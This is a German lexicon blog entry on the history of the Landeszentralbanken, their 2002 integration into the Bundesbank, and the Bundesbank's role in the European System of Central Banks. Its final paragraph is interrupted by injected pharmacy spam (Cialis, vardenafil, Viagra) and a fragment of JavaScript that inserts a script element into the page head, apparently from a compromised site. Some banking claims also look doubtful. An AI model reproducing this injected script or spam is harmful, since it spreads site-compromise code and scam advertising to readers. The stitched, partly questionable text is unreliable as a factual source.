Landeszentralbank

Die Landeszentralbanken wurden nach amerikanischem Vorbild im Jahr 1948 gegründet. Jede von ihnen war bis 1992 eine selbstständige Notenbank. Am 1.11.1992 wurden folgende Landeszentralbanken aus 16 Bundesländern zusammengelegt: das Saarland mit Rheinland-Pfalz, Niedersachsen mit Bremen und Sachsen-Anhalt, Berlin mit Brandenburg. Neu gegründet wurden die Zentralbanken von Sachsen und Thüringen.

Strukturreform der Bundesbank

Im Jahr 2002 erfolgte eine Strukturreform. Die Eigenständigkeit der Landeszentralbank wurde aufgehoben und der Name Zentralbank gestrichen. Alle ehemaligen Landeszentralbanken sind unselbstständige Hauptverwaltungen, die in die Deutsche Bundesbank integriert sind. Die Aufgabenverteilung ist jedoch die gleiche geblieben. Nach wie vor üben die ehemaligen Landeszentralbanken ihr reguläres Bankengeschäft aus. Dazu gehören die Vergabe von großen Krediten, der Außenwirtschaftshandel und die Aufsicht über das Bankenwesen.

Unterstützung der Europäischen Zentralbank (EZB)

Seit dem Jahr 1999 ist die Europäische Zentralbank (EZB) für die europäische Geldpolitik verantwortlich. Sie wird von der Deutschen Bundesbank bei ihren Aufgaben unterstützt. Dazu gehört auch, die Preisstabilität der gemeinsamen Währung zu unterstützen. Darüber hinaus wickelt sie den inländischen und ausländischen Zahlungsverkehr ab. Obwohl die Deutsche Bundesbank regierungsunabhängig arbeitet, unterstützt sie dennoch ihre Beschlüsse. Gleichzeitig ist sie ein Mitglied des europäischen Systems für die Zentralbanken, in der die alten Zentralbanken der europäischen Länder integriert sind, die den Euro als Währungssystem eingeführt haben. Die Deutsche Bundesbank ist die Hauptbank von Deutschland und nicht nur für die Ausgabe von Geld zuständig. Ihre Aufgabe ist es auch, das Land vor einer Inflation zu schützen. Es handelt sich dabei um eine öffentliche Verwaltung mit Sitz in Frankfurt am Main. Sie ist ein wichtiger Bestandteil des Europäischen Systems der Zentralbanken. buy Cialis online order vardenfil online cheap Viagra Gold document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName('head')[0].appendChild(s);

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.